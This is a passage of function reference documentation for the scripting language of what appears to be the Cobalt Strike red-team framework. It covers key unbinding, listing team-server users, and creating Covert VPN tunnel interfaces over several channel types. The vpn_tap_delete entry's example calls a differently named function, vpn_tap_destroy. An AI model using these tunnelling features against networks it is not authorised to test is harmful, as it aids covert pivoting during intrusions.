unbind
Remove a keyboard shortcut binding.
Arguments
$1- the keyboard shortcut
Example
# restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left");
unbind("Ctrl+Right");
See also
&bind
url_open
Open a URL in the default browser.
Arguments
$1- the URL to open
Example
command go {
url_open("http://forum.cobaltstrike.net/");
}
users
Returns a list of users connected to this team server.
Returns
An array of users.
Example
foreach $user (users()) {
println($user);
}
vpn_interface_info
Get information about a VPN interface.
Arguments
$1- the interface name
$2- [Optional] the key to extract a value for
Returns
%info = vpn_interface_info("interface");
Returns a dictionary with the metadata for this interface.
$value = vpn_interface_info("interface", "key");
Returns the value for the specified key from this interface’s metadata
Example
# create a script console alias to interface info
command interface {
println("Interface $1");
foreach $key => $value (vpn_interface_info($1)) {
println("$[15]key $value");
}
}
vpn_interfaces
Return a list of VPN interface names
Returns
An array of interface names.
Example
printAll(vpn_interfaces());
vpn_tap_create
Create a Covert VPN interface on the team server system.
Arguments
$1- the interface name (e.g., phear0)
$2- the MAC address ($null will make a random MAC address)
$3- reserved; use $null for now.
$4- the port to bind the VPN’s channel to
$5- the type of channel [bind, http, icmp, reverse, udp]
Example
vpn_tap_create("phear0", $null, $null, 7324, "udp");
vpn_tap_delete
Destroy a Covert VPN interface
Arguments
$1- the interface name (e.g., phear0)
Example
vpn_tap_destroy("phear0");
Continue Reading User Guide - Part 5 (Report and Logging)